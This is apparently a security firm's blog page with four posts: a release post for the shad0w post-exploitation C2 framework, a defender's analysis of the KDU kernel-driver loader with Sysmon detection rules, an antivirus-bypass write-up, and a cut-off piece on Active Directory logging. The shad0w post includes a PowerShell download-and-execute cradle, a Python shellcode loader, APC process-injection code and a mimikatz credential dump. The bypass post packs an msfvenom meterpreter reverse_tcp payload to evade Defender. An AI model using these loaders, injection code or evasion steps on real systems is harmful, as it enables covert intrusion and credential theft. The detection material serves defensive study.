shad0w

Posted by bats3c on June 3rd, 2020

This project can be found on GitHub.

Post exploitation is a large part of a red team engagement. As many organisations mature and deploy a range of sophisticated Endpoint Detection & Response (EDR) solutions onto their networks, we as attackers are required to mature as well. We need to upgrade our arsenal to give us the capabilities to operate successfully on their networks. That is why, today, I am releasing shad0w.

shad0w is a post exploitation framework designed to operate covertly on such networks, providing the operator with much greater control over their engagements. In future blog posts I will go into greater detail on the intricacies of how shad0w works; this post will therefore serve as an introduction to the usage and features that shad0w has to offer.

Overview & Install

shad0w is designed to be run inside Docker to make life easier for the operator, as it has some very specific dependencies which are required for it to work correctly. Installation is very simple, requiring just the two commands shown below.

$ git clone https://github.com/bats3c/shad0w.git && cd shad0w
$ sudo ./shad0w install

Getting a foothold

shad0w implants are called beacons. There are two types of beacons: secure and insecure. Secure beacons are designed to operate in environments where it is vital to remain undetected whereas insecure beacons are for environments where the security is much more relaxed.

Currently there are 3 different formats for beacons: exe, shellcode and powershell. The shellcode and powershell formats allow shad0w to be used in completely fileless attacks, with everything running entirely in memory.

To generate such a payload you can use the command shown below. This will place the payload of a statically linked secure beacon in beacon.ps1.

$ shad0w beacon -p x64/windows/secure/static -H your.redirector -f psh -o beacon.ps1

The next step is to start the C2 server. When starting the C2 it will need to be given the address that the beacon will connect to, so if you are using redirectors this is not the address of the C2 itself but rather the address of your first redirector. The command for starting a C2 instance for the beacons to call back to is shown below.

$ shad0w listen -e your.redirector

A feature which could also be useful is the C2 server's ability to live proxy and essentially clone a website. This feature can be used with the --mirror or -m flag. This example would mirror the site https://www.bbc.com/ to the address of your redirector, https://your.redirector/

$ shad0w listen -e your.redirector -m "https://www.bbc.com/"

So when you visit your redirector you are served https://www.bbc.com/. This will also proxy any links you click or files you download from the mirrored site.

Now that your C2 is up and running you can execute the beacon. I will use PowerShell as an example, but because the beacon is in shellcode form you can quite easily execute it from many other languages.

PS> IEX (New-Object System.Net.WebClient).DownloadString("https://another.redirector/beacon.ps1")

And we get a callback
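
Since the payload is plain shellcode, a stager in almost any language will do the job. Purely as an illustration (this is not shad0w code, and the raw-shellcode URL below is hypothetical), a minimal Python ctypes loader looks something like this:

import ctypes
import urllib.request

# hypothetical location serving the beacon in raw shellcode format
shellcode = urllib.request.urlopen("https://another.redirector/beacon.bin").read()

kernel32 = ctypes.windll.kernel32
kernel32.VirtualAlloc.restype = ctypes.c_void_p

MEM_COMMIT_RESERVE = 0x3000
PAGE_EXECUTE_READWRITE = 0x40

# allocate executable memory, copy the shellcode in and call it like a function
buf = kernel32.VirtualAlloc(None, len(shellcode), MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE)
ctypes.memmove(buf, shellcode, len(shellcode))
ctypes.CFUNCTYPE(None)(buf)()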

Enumeration

Now that we have an active session on the machine we can interact with it via the beacons command.

shad0w ≫ beacons -i 1

shad0w has some useful commands that can be used to explore and interact with the local file system, e.g. ls, cd, pwd, rm, cat and mkdir, while also letting you upload and download files.

One of the most useful features of shad0w is that it allows you to execute any .NET assembly, EXE, DLL, VBS, JS or XSL file in memory on the target without anything touching disk. For example, to execute the .NET assembly seatbelt.exe in memory you can use the execute command, giving the file name with the -f flag and any arguments with the -p flag.

shad0w ≫ execute -f seatbelt.exe -p all

All the output from the command will be sent back to your terminal window.

Privilege Escalation

I have designed shad0w to be very modular, allowing operators to create and use their own modules, and I have kept this philosophy in mind when making the elevate command. It is designed to help elevate the current beacon's privileges using common privilege escalation techniques and exploits, all of which are stored in easy-to-use modules, allowing an operator to create new modules or build on existing ones easily.

To list the available privesc modules for the current session you can use the --list or -l flag

shad0w ≫ elevate --list

Modules come in two different modes: check and exploit. To run a module in check mode use the --check or -c flag, and to use a module in exploit mode use the --use or -u flag.

shad0w ≫ elevate --check system_printspoofer
shad0w ≫ elevate --use system_printspoofer

If an exploit is successful you will receive a new session from a beacon with elevated privileges.

Modules

As I previously said, shad0w is designed to be very modular making the creation of new modules not much of a challenge. To showcase this I’ve added a mimikatz module. It will be executed inside memory like any module you decide to run but it should never be run over a secure beacon. This is because by design mimikatz is not very operationally secure so any half decent EDR should catch it very quickly. It is very much a welcome addition to the insecure beacons though.

This module can be used with the mimikatz command.

shad0w ≫ mimikatz -x sekurlsa::logonpasswords

Any other mimikatz command can also be run by using the -x flag.

Defenses

In future blog posts I will go into a lot more detail on how these defences work in the secure beacon – but here's a quick overview.

Currently shad0w uses 3 main defences:

  • Dynamic in memory code execution
  • Directly using syscalls
  • Anti DLL injection

Dynamic in memory code execution

This is achieved by safely hijacking alertable threads in running processes and injecting the modules directly into them. This can help to avoid Sysmon event ID 8, which can be used to detect process injection.
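
As a very rough illustration of the idea (this is not shad0w's actual implementation, and it omits the thread discovery and safety checks that matter in practice), queuing an APC onto a thread that is known to enter an alertable wait looks roughly like this:

import ctypes

k32 = ctypes.windll.kernel32
k32.OpenProcess.restype = ctypes.c_void_p
k32.OpenThread.restype = ctypes.c_void_p
k32.VirtualAllocEx.restype = ctypes.c_void_p

PROCESS_VM_OP_WRITE = 0x0008 | 0x0020   # PROCESS_VM_OPERATION | PROCESS_VM_WRITE
THREAD_SET_CONTEXT = 0x0010
MEM_COMMIT_RESERVE = 0x3000
PAGE_EXECUTE_READWRITE = 0x40

def queue_apc(pid, tid, shellcode):
    hproc = k32.OpenProcess(PROCESS_VM_OP_WRITE, False, pid)
    remote = k32.VirtualAllocEx(ctypes.c_void_p(hproc), None, len(shellcode),
                                MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE)
    written = ctypes.c_size_t(0)
    k32.WriteProcessMemory(ctypes.c_void_p(hproc), ctypes.c_void_p(remote),
                           shellcode, len(shellcode), ctypes.byref(written))
    hthread = k32.OpenThread(THREAD_SET_CONTEXT, False, tid)
    # the APC only fires when the target thread next enters an alertable wait
    k32.QueueUserAPC(ctypes.c_void_p(remote), ctypes.c_void_p(hthread), None)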

Directly using syscalls

By directly using native Windows syscalls, shad0w is able to avoid any userland API hooks placed by EDR solutions. This will greatly reduce their ability to monitor shad0w.
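
For a flavour of what working with syscalls directly involves (an illustration, not shad0w source), the snippet below reads the stub of an Nt* function in the current process to recover its syscall service number – the value a direct-syscall stub would then invoke itself. If an EDR has hooked the function, the stub usually starts with a jmp rather than the expected bytes, which is a tell in its own right:

import ctypes

ntdll = ctypes.WinDLL("ntdll")
addr = ctypes.cast(ntdll.NtAllocateVirtualMemory, ctypes.c_void_p).value
stub = bytes((ctypes.c_ubyte * 8).from_address(addr))

# unhooked x64 stubs begin: 4C 8B D1 (mov r10, rcx)  B8 <SSN> (mov eax, imm32)
if stub[:3] == b"\x4c\x8b\xd1" and stub[3] == 0xB8:
    ssn = int.from_bytes(stub[4:8], "little")
    print(f"NtAllocateVirtualMemory syscall number = {ssn:#x}")
else:
    print("stub does not look clean - possibly hooked")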

Anti DLL injection

The main method EDR solutions use to hook and monitor programs is injecting a DLL into running processes, allowing them to watch the inner workings of a program. This is currently combated in two ways: enforcing that only Microsoft-signed DLLs are allowed into child processes (not many EDR DLLs are signed by Microsoft), and maintaining a whitelist of DLLs that are allowed into processes while blocking all others. The whitelist ensures that even a DLL signed by Microsoft will still not be able to enter any of the processes.
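
For reference, the Microsoft-signed-only restriction is something Windows itself exposes. The sketch below (illustrative only, not shad0w's code) shows a process opting itself in via SetProcessMitigationPolicy; for child processes the same policy can be applied with the PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY attribute at CreateProcess time:

import ctypes
from ctypes import wintypes

ProcessSignaturePolicy = 8  # value from the PROCESS_MITIGATION_POLICY enum

class SIGNATURE_POLICY(ctypes.Structure):
    _fields_ = [("Flags", wintypes.DWORD)]

policy = SIGNATURE_POLICY(Flags=1)  # bit 0 = MicrosoftSignedOnly

k32 = ctypes.WinDLL("kernel32", use_last_error=True)
if not k32.SetProcessMitigationPolicy(ProcessSignaturePolicy,
                                      ctypes.byref(policy),
                                      ctypes.sizeof(policy)):
    raise ctypes.WinError(ctypes.get_last_error())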

Stay Up To Date

This is a constantly evolving project under active development. There are lots of exciting new features to be added over the coming weeks, so make sure you stay up to date with the latest changes on this project's GitHub.

A Defender’s Guide For Rootkit Detection: Episode 1 – Kernel Drivers

Posted by rootkid8 on April 20th, 2020

Author: Thom (@rootkid8), Sysmon Mastery Help from Rana (@sec_coffee)

Introduction

Even before my birth, rootkits have been one of the most sophisticated and successful ways of obtaining persistence on a machine, and now in 2020 there are ever more trivial ways of escalating from system to kernel. Recently JUMPSEC's youngest red team researcher @_batsec_ raised the bar once more, using rootkit techniques to universally evade Sysmon. This method of defeating Event Tracing for Windows is an incredible feat, and the world of Windows logging is left shaken. As a result, we're going to go down the rabbit hole of kernel driver rootkits, specifically looking at the use of vulnerable kernel drivers to escalate to ring zero. First we need to start with some basics: how the Windows kernel implements defence in depth, how to bypass these restrictions, and how network defenders and system administrators can detect these techniques as "trivially" as attackers can implement them (skip to the end for a Sysmon config).

Some OS Basics

For those of us who don't know, operating systems and common CPUs define hierarchical protection domains to implement defence in depth. Code executing on the CPU runs in one of these rings using CPU modes – with ring 3 being user-land and ring 0 being kernel-land.

Only certain applications that require access to low-level devices and hardware should be allowed to run code in rings 2, 1 and 0, which is enforced at a microcode level on the CPU as well as by the operating system. In theory this privilege model is sound, and its introduction expelled the days of causing total system crashes with one line of buggy code in user-land. However, the implementation of these rings at the operating system level, and worse still at the driver level, is reasonably vague and undocumented, opening up an entire space for kernel driver exploits as post exploitation privilege escalation and persistence mechanisms.

Writing a Kernel Mode Driver

We’re going to look more closely at how Windows handles device drivers, since these drivers allow access to kernel space, we will hopefully uncover some of the ways to get arbitrary code to run in kernel mode without the use of a signed driver. Heck, writing a kernel mode driver isn’t a particularly challenging task, but if you want it to run on a target system it will require setting up “Test Mode” on the operating system or completely disabling device driver signing enforcement (DSE) globally which requires access to the boot settings, or through running the following command followed by a reboot:

bcdedit /set testsigning on

Both of these techniques are about as stealthy as using a sledgehammer to hide the noise of your power drill: not only will most ordinary users recognise the Test Mode warning on their device, many organisations restrict this functionality group-wide, and if they don't then they really should. There is of course a way to hide the watermarks and warnings, but again this is a sledgehammer approach, since bcdedit will be caught by a blue team with any real level of sophistication.

Instead, we need to bypass Driver Signature Enforcement and PatchGuard, both of which are Windows kernel protection mechanisms: one prevents unsigned drivers from being loaded, and the other prevents drivers from modifying critical kernel data structures through integrity checks. Again, any blue team should be able to detect the loading of a driver with an expired certificate – SwiftOnSecurity's handy Sysmon config will anyway!

The Story of One Kernel Driver Loader…

In order to explore these kernel mode drivers, we need to take a trip back in time. There used to be (and still are) some fantastic base projects for kernel mode drivers like the ones we're investigating, written by a legend in this space, @hfiref0x. We'll start with TDL, or Turla Driver Loader. Around 4 years ago, this tool was a rootkit developer's wet dream. It's the successor to DSEFix, another driver loader written by hfiref0x, which became obsolete because its modification of kernel variables got blocked by PatchGuard, rendering it a guaranteed blue screen generator – a fun prank but not what we're looking for.

TDL acts as a fully functional driver loader that can be used independently of the Windows loader, and as a byproduct it defeats 64-bit driver signature enforcement as well. The magic of Turla is the offensive technique it uses to get a custom driver loaded into kernel memory. It comes packaged with a vulnerable version of a VirtualBox kernel mode driver; it loads and exploits this driver to overwrite kernel memory with a custom crafted driver, before jumping to the DriverEntry function to begin execution. Effectively the flow is: load the vulnerable driver, exploit it to write the custom driver into kernel memory, then jump to its DriverEntry.

This technique is somewhat akin to process hollowing, but instead of creating a suspended process and mapping our code into it, we load a known driver and use shellcode to map our malicious code into that segment of memory.

The technique is surprisingly simple, but extremely effective. Since the VirtualBox driver already runs in kernel mode, by dropping shellcode that now runs in kernel land we can perform a move, a map and a jump (in reality it's much more complex than that, but for simplicity's sake we rely on those three steps). This means that all a target kernel driver needs is permission to read and write physical memory, and a code execution CVE, for it to become a candidate for kernel driver loading.

Clearly hfiref0x doesn’t sleep, and soon after TDL, Stryker was released, yet another kernel driver loader. This time the loader was crafted to exploit a CPU-Z driver instead, functioning very similarly to its predecessor. Now again in 2020,  hfiref0x strikes again with the release of Kernel Driver Utility (KDU) just 2 months ago, the same concept is being used, except now KDU supports multiple vulnerable drivers as “functionality providers”. Hilariously named, these functionality providers are the keys to the kingdom, and if we have any hopes of detecting rootkits that use this technique we need to understand how KDU loads these drivers, how it exploits them, and what breadcrumbs we can search for on systems to check for compromise.

Looking briefly at the GitHub attributes we can see there are 4 CVEs associated with the project:

[Figure: CVEs listed on the KDU GitHub page]

With more providers mentioned in the README:

  • ATSZIO64 driver from ASUSTeK WinFlash utility of various versions;
  • GLCKIO2 (WinIo) driver from ASRock Polychrome RGB of version 1.0.4;
  • EneIo (WinIo) driver from G.SKILL Trident Z Lighting Control of version 1.00.08;
  • WinRing0x64 driver from EVGA Precision X1 of version 1.0.2.0;
  • EneTechIo (WinIo) driver from Thermaltake TOUGHRAM software of version 1.0.3.

The most notable thing regarding these vulnerabilities is that they all expose ring-zero code execution capabilities, enabling the entire kill-chain of KDU. Even more interestingly, the description of CVE-2019-16098 states: "These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code."

As a disclaimer, hfiref0x states that KDU and all similar tools are not actually hacking tools – they are for driver developers to make their lives easier. A lazy AV will flag this tool as malware, but in many senses of the word KDU is malware in the same way a remote access tool for sysadmins can be malware.

Static Analysis 

[WARNING: RABBIT HOLE AHEAD]

If you’re not interested in KDU source code or boring operating system details then skip to Dynamic Analysis.

Examining the source code of KDU we see an abstraction layer that is implemented by the driver loader, each provider has the following structure:

typedef struct _KDU_PROVIDER {

    /* ...unrelated fields omitted... */

    struct {
        provRegisterDriver RegisterDriver; //optional
        provUnregisterDriver UnregisterDriver; //optional

        provAllocateKernelVM AllocateKernelVM; //optional
        provFreeKernelVM FreeKernelVM; //optional

        provReadKernelVM ReadKernelVM;
        provWriteKernelVM WriteKernelVM;

        provVirtualToPhysical VirtualToPhysical; //optional
        provReadControlRegister ReadControlRegister; //optional

        provQueryPML4 QueryPML4Value; //optional
        provReadPhysicalMemory ReadPhysicalMemory; //optional
        provWritePhysicalMemory WritePhysicalMemory; //optional
    } Callbacks;
} KDU_PROVIDER, * PKDU_PROVIDER;

I’ve ignored the unimportant fields, but from here we can understand what it takes to construct a provider, and we can see there are function pointers required for:

  • reading and writing virtual memory,
  • mapping virtual addresses to physical addresses,
  • reading and writing physical addresses, and
  • reading two kernel registers – the PML4 and the Control Register.

It should be pretty clear so far why we need to be able to read and write physical and virtual memory addresses, but what are the PML4 and the control register, and why does the exploit require them? Well, if you're familiar with Linux kernels then the PML4 is simply the base address of the multi-level page table that the kernel uses to map linear virtual address spaces to processes. In order to replace our driver in memory we need to be able to find where it's stored, which requires reading from the page table to find the address space of the target driver. Hence we read this base address from the PML4 register.

The control register should also be familiar to kernel developers or assembly folks, but for those of you who don't know – it's a 64-bit register that has a few important use cases required by virtual memory mapping and paging. In cases where a provider defines no function for mapping virtual memory to physical memory and none for reading the PML4, KDU uses the control register value to find the page directory address. This allows it to translate virtual addresses to physical addresses so it can walk through the page table and overwrite physical kernel memory regions:

BOOL PwVirtualToPhysical(
    _In_ HANDLE DeviceHandle,
    _In_ provQueryPML4 QueryPML4Routine,
    _In_ provReadPhysicalMemory ReadPhysicalMemoryRoutine,
    _In_ ULONG_PTR VirtualAddress,
    _Out_ ULONG_PTR* PhysicalAddress)
{
    ULONG_PTR   pml4_cr3, selector, table, entry = 0;
    INT         r, shift;

    *PhysicalAddress = 0;

    if (QueryPML4Routine(DeviceHandle, &pml4_cr3) == 0)
        return 0;

    table = pml4_cr3 & PHY_ADDRESS_MASK;

    for (r = 0; r < 4; r++) {

        shift = 39 - (r * 9);
        selector = (VirtualAddress >> shift) & 0x1ff;

        if (ReadPhysicalMemoryRoutine(DeviceHandle,
            table + selector * 8,
            &entry,
            sizeof(ULONG_PTR)) == 0)
        {
            return 0;
        }

        if (PwEntryToPhyAddr(entry, &table) == 0)
            return 0;

        if ((r == 2) && ((entry & ENTRY_PAGE_SIZE_BIT) != 0)) {
            table &= PHY_ADDRESS_MASK_2MB_PAGES;
            table += VirtualAddress & VADDR_ADDRESS_MASK_2MB_PAGES;
            *PhysicalAddress = table;
            return 1;
        }
    }

    table += VirtualAddress & VADDR_ADDRESS_MASK_4KB_PAGES;
    *PhysicalAddress = table;

Digging deeper into the source code we discover that there are actually two drivers at play here: a victim driver and a vulnerable driver. Initially I presumed these to be the same driver, but the code unpacks, loads and starts the vulnerable driver first – this is the provider – after which it calls KDUMapDriver, which tries to load the victim driver.

In the case of KDU, the victim driver is always the Process Explorer driver, PROCEXP152.sys. KDU bootstraps shellcode into the IRP_MJ_DEVICE_CONTROL callback of PROCEXP152 before finally unloading it, triggering the shellcode to execute inside PROCEXP152 and allowing the target driver to be loaded into kernel memory.

Finally, let’s take a look at the core loader functionality, we want to understand the shellcode bootstrapping, and the system calls used to help us figure out what level of detection is possible. This snippet of code is where the bootstrapping happens inside KDUSetupShellCode:

        //
        // Resolve import (ntoskrnl only) and write buffer to registry.
        //
        isz = FileHeader->OptionalHeader.SizeOfImage;

        DataBuffer = supHeapAlloc(isz);
        if (DataBuffer) {
            RtlCopyMemory(DataBuffer, Image, isz);

            printf_s("[+] Resolving kernel import for input driver\r\n");
            supResolveKernelImport((ULONG_PTR)DataBuffer, KernelImage, KernelBase);

            lResult = RegOpenKey(HKEY_LOCAL_MACHINE, NULL, &hKey);
            if ((lResult == ERROR_SUCCESS) && (hKey != NULL)) {

                lResult = RegSetKeyValue(hKey, NULL, TEXT("~"), REG_BINARY,
                    DataBuffer, isz);

                bSuccess = (lResult == ERROR_SUCCESS);

                RegCloseKey(hKey);
            }
            supHeapFree(DataBuffer);
        }
    }

We see that it first finds the ntoskrnl.exe base address – this is the start of the kernel's mapped memory region, containing important structures such as the page directory of mapped memory for all processes on the system. This is important because most process monitoring tools should be able to detect if this image is loaded. After this it calls KDUStorePayload on the driver filename passed to it – interestingly, this function writes a byte buffer that is just the raw bytes of rootkit.sys (or whatever input kernel mode driver you specify) to a registry value under HKLM named "~":

[4d5a is hex for MZ also known as the magic bytes in the header of a PE image.]

A fun part of this registry write is that KDU doesn't clean up after itself, so this artifact remains on the system as an IOC even after KDU's removal. I've thrown together a little PowerShell script, which you can find in the appendix, for incident responders to check whether any PE data has been written to registry keys. It will detect KDU in its default state, as well as any basic attempts at modifying KDU to change the target key, and any other tools that write executable data to the registry.
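
The PowerShell version is linked in the appendix; a rough Python sketch of the same idea (walk HKLM and flag large binary values that begin with the MZ magic bytes) could look like this – run it from an elevated prompt, and treat hits as leads rather than verdicts:

import winreg

def find_pe_values(root=winreg.HKEY_LOCAL_MACHINE, path=""):
    hits = []
    try:
        key = winreg.OpenKey(root, path)
    except OSError:
        return hits                    # no access or the key vanished - skip
    i = 0
    while True:                        # values at this level
        try:
            name, data, _ = winreg.EnumValue(key, i)
        except OSError:
            break
        if isinstance(data, bytes) and len(data) > 1024 and data[:2] == b"MZ":
            hits.append((path, name, len(data)))
        i += 1
    j = 0
    while True:                        # recurse into subkeys
        try:
            sub = winreg.EnumKey(key, j)
        except OSError:
            break
        hits.extend(find_pe_values(root, path + "\\" + sub if path else sub))
        j += 1
    return hits

for hit in find_pe_values():
    print(hit)   # a default KDU run leaves a large MZ blob in a value named "~"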

Furthermore, we come across this function, VictimBuildName in victim.cpp, which builds the path used to write the victim driver's .sys file into the %TEMP% directory:

LPWSTR VictimBuildName(
    _In_ LPWSTR VictimName
)
{
    LPWSTR FileName;
    SIZE_T Length = (1024 + _strlen(VictimName)) * sizeof(WCHAR);

    FileName = (LPWSTR)supHeapAlloc(Length);
    if (FileName == NULL) {
        SetLastError(ERROR_NOT_ENOUGH_MEMORY);
    }
    else {

        DWORD cch = supExpandEnvironmentStrings(L"%temp%\\", FileName, MAX_PATH);
        if (cch == 0 || cch > MAX_PATH) {
            SetLastError(ERROR_NOT_ENOUGH_MEMORY);
            supHeapFree(FileName);
            FileName = NULL;
        }
        else {
            _strcat(FileName, VictimName);
            _strcat(FileName, L".sys");
        }
    }

    return FileName;
}

This is exciting, as file writes are also a solid way of detecting malicious activity, especially if the write paths are hardcoded into the executable and not generated on the fly or randomly.

Dynamic Analysis

Now that we have some potential indicators of execution for KDU from the source code – registry writes, file writes and image loads – we're going to run some tests to see how this works in practice. To test these providers, I compiled KDU from source, wrote a custom kernel mode driver that acts as a tiny example rootkit, and wrote a batch script to execute kdu -map -prv <ID> rootkit.sys repeatedly with each of the providers in sequence. In each case we analyse the changes made to the system; in this example we'll be using Procmon and Sysmon.

The Procmon test shows a pretty clear pattern of events, demonstrated by the following diagram:

[Figure: Procmon event sequence]

Using our custom Sysmon config, we also see the following events traced by Sysmon:

  1. Create %TEMP%\PROVIDER.sys 
  2. Set HKLM\System\CurrentControlSet\Services\PROVIDER\Start registry value to 3 (Manual Start)
  3. Set HKLM\System\CurrentControlSet\Services\PROVIDER\ImagePath to %TEMP%\PROVIDER.sys
  4. DRIVER LOADED: PROVIDER.sys
  5. Create %CD%\PROCEXP152.sys
  6. Set HKLM\System\CurrentControlSet\Services\PROCEXP152\Start registry value to 3 (Manual Start)
  7. Set HKLM\System\CurrentControlSet\Services\PROCEXP152\ImagePath to %CD%\PROCEXP152.sys
  8. DRIVER LOADED: PROCEXP152.sys
  9. Unsigned Image loaded rootkit.sys

This makes more sense if we understand that the registry values in HKLM\System\CurrentControlSet\Services\<Driver>\ are set and unset when Windows services are loaded, and these actions aren’t actually performed by the KDU code directly. Instead these events can be read as:

  1. Unpack vulnerable (provider) driver to %CD%
  2. Start it
  3. Write rootkit binary data to HKLM\~ registry hive
  4. Unpack victim driver (PROCEXP152.sys) to %TEMP%
  5. Start it
  6. Unsigned rootkit kernel driver loaded into kernel memory

This is almost exactly the pattern evident from the source code, although we had to add an explicit rule to pick up the binary data in HKLM\~. What we can also note here is that this entire process relies on the loading of a very particular version of a vulnerable driver – this means it will have a particular hash which we can use as a signature. The final event – an unsigned driver being loaded into memory – is the biggest telltale sign of something suspicious happening.

Conclusion

Now, obviously we could have just executed KDU right at the start of this and obtained the IOCs instantly, but where's the fun in that? Instead you should now understand one fairly general technique for elevating from system to kernel, the inner workings of kernel level driver loaders (and the many similar tools using this technique), as well as how we can detect them.

These detection techniques aren't particularly sophisticated, however, and nothing prevents an adversary from patching or tweaking these variables so that KDU writes to different registry keys or disk locations. Or, worse yet, making it load the victim and vulnerable drivers from memory instead of dumping them to disk first, in which case we would only see the starting and stopping of the vulnerable and victim driver services. Then simply patching the vulnerable drivers with arbitrary null bytes before loading them would change the hashes detected by Sysmon. Such is life in cybersecurity… In part 2 we're going to look at some more sophisticated evasion techniques that rootkits use, and how we can detect those too, so stay tuned!

All credit goes to the supporting work in this area: people like @hfiref0x, @fuzzysec, and of course our dude @_batsec_, who constantly find ways to break the Windows kernel and invalidate the integrity of our operating systems – one of the many wonders of this world.

Appendix

  1. Some Sysmon rules for detecting KDU and similar tools (the DriverLoad and ImageLoad events may require you to update your exclusion filters), as the vulnerable drivers that get loaded often appear legitimate and are even signed by Microsoft in the case of PROCEXP152.sys.
<Sysmon schemaversion="4.23">
    <EventFiltering>
        <RuleGroup name="" groupRelation="or">
            <DriverLoad onmatch="include">
                <ImageLoaded condition="contains" name="MITRE_REF=T1014,NAME=Rootkit">Temp\PROCEXP152.sys</ImageLoaded>
                <Hashes condition="is" name="MITRE_REF=T1014,NAME=Rootkit">C06DDA757B92E79540551EFD00B99D4B</Hashes>
            </DriverLoad>
        </RuleGroup>
        <RuleGroup name="" groupRelation="or">
            <ImageLoad onmatch="include">
                <Signed name="MITRE_REF=T1014,NAME=Rootkit" condition="is">false</Signed>
                <ImageLoaded name="MITRE_REF=T1014,NAME=Rootkit" condition="is">C:\Windows\System32\ntoskrnl.exe</ImageLoaded>
            </ImageLoad>
        </RuleGroup>
        <RuleGroup name="" groupRelation="and">
            <FileCreate onmatch="include">
                <TargetFilename name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">\AppData\Local\Temp\PROCEXP152.sys</TargetFilename>
            </FileCreate>
            <FileCreate onmatch="exclude">
                <Image condition="contains">procexp64.exe</Image>
                <Image condition="contains">procexp.exe</Image>
                <Image condition="contains">procmon64.exe</Image>
                <Image condition="contains">procmon.exe</Image>
            </FileCreate>
        </RuleGroup>
        <RuleGroup name="" groupRelation="or">
            <RegistryEvent onmatch="include">
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">PROCEXP152\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">RTCore64\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">Gdrv\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">ATSZIO\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">MsIo64\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">MsIo\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">GLCKIo2\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">EneIo64\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">EneIo\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">WinRing0x64\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">WinRing0_1_2_0\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">EneTechIo64\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">EneTechIo\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">NalDrv\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">HKLM\~</TargetObject>
            </RegistryEvent>
        </RuleGroup>
    </EventFiltering>
</Sysmon>
  2. A basic PowerShell script for incident responders to help perform analysis on target machines. The script simply recurses through the entire HKLM registry space and checks for any executable data (by checking the PE header magic bytes and length of the entry).

https://gist.github.com/thomjs/e7c5f6087ff646acf32dae89e9c7ecf2

References

  1. https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/
  2. https://github.com/hfiref0x/KDU/
  3. https://swapcontext.blogspot.com/2020/01/unwinding-rtcore.html
  4. https://eclypsium.com/wp-content/uploads/2019/08/EXTERNAL-Get-off-the-kernel-if-you-cant-drive-DEFCON27.pdf
  5. https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities 
  6. https://www.fuzzysecurity.com/tutorials/expDev/23.html

Bypassing Antivirus with Golang – Gopher it!

Posted by warden on June 20th, 2019

In this blog post, we’re going to detail a cool little trick we came across on how to bypass most antivirus products to get a Metepreter reverse shell on a target host. This all started when we came across a Github repository written in Golang, which on execution could inject shellcode into running processes. By simply generating a payload with msfvenom we tested it and found that it was easily detected by Windows Defender. The Meterpreter payload was generated as follows:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -b '\x00' -f hex

The perk of using Go for this experiment is that it can be cross-compiled from a Linux host for a target Windows host. The command to compile the application was:

GOOS=windows GOARCH=amd64 go build

This produces a Go exe which is executed from the command line along with the shellcode the attacker wants to inject. This was easily detected, and Windows Defender identified it as Meterpreter without any trouble. As a quick and easy bypass, we tried to compress the executable using UPX in brute mode, which compresses it 8 times. No luck here either, as Windows Defender caught it again.

Fig.1- Attempting to run the Go exe file with the shellcode as an argument. As you can see it was easily detected by Windows Defender. We then tried with the UPX compressed sc.exe file, which also didn’t work.

Fig.2 – Of course, the Meterpreter session is killed as soon as the process is detected by Windows Defender.

From here we inspected the source code of the Go program. After some review, we discovered that the main.go source file could be modified to take the shellcode as a variable then compiled – instead of compiling the .exe then adding the shellcode as a command line argument.

Fig.3 – The go-shellcode/cmd/sc/main.go source.

Fig.4 – The modified go-shellcode/cmd/sc/main.go source, where the reference to a command line argument is substituted for a declared variable.

With these changes we compiled two .exe files, one to be tested without UPX compression and one with UPX compression. Windows Defender detects the non-compressed version as soon as it touches disk, but does not detect the UPX compressed .exe with static analysis.

Fig.5 – The .exe with no UPX compression is instantly detected as containing a Meterpreter payload by Windows Defender. No dice.

Running the custom UPX compressed .exe file is successful however, and a reverse shell is achieved!

Fig.6 – Running the UPX compressed Go exe file is successful, and a reverse shell is achieved on the victim’s machine.

Fantastic. Let’s run it against VT to check how loud the signature for this is.

Fig.7 – Uploading the UPX compressed Go exe file to Virus Total. Only Cybereason and Cylance detect the file as being malicious.

Only two antivirus engines are picking up that there is a malicious payload in this file, and neither of them specifies what exactly about the upload is malicious, just that it IS malicious. The UPX compression is likely what's triggering the alert, as UPX compression can be used to obfuscate malicious files.

Fig.8 – UPX compression in brute mode compresses the exe file 8 times.

And that’s it! In this blog post we detailed how we modified a great Go program from Github (resource listed below) that performed shellcode injection into one that efficiently evaded most antivirus programs.

The gist for this is available here

Reference:

https://github.com/brimstone/go-shellcode

https://boyter.org/posts/trimming-golang-binary-fat/

https://blog.filippo.io/shrink-your-go-binaries-with-this-one-weird-trick/

Enhanced logging to detect common attacks on Active Directory – Part 1

Posted by bugzBunny on February 6th, 2019


In this blog post I am going to tackle the topic of detecting common attacks using Active Directory logs. It is important to understand the power of data in the InfoSec world. Too much data means you'll be spending the rest of the week digging through millions of log entries to try and figure out what the adversary was up to. You can set filters to help you through this, however it can get computationally expensive very fast depending on how your filters operate. It also requires you to know what to specifically look out for! You need to have confidence in your filters and test them thoroughly from time to time to make sure they actually work.


